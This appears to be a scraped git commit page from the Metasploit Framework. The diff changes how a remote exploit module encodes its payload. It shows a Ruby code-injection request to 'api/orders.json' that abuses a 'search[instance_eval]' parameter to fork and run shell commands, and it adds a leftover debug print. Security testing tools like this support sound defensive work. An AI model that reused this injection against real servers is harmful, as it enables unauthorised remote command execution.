fixup the payload encoding, per joernchen's comment in the #metasploit channel.
git-svn-id: file:///home/svn/framework3/trunk@13747 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9ada448a16
commit
064255e910
|
@ -59,7 +59,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
command = Rex::Text.uri_encode(payload.encoded)
|
||||
command = Rex::Text.uri_encode(payload.raw, 'hex-all')
|
||||
|
||||
puts command
|
||||
|
||||
urlconfigdir = datastore['URI'] + "api/orders.json?search[instance_eval]=Kernel.fork%20do%60#{command}%60end"
|
||||
res = send_request_raw({
|
||||
'uri' => urlconfigdir,
|
||||
|
|
Loading…
Reference in New Issue